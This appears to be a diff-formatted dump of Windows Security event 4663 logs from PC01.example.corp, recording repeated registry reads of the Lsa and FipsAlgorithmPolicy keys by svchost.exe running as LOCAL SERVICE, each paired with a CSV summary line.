+ + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + 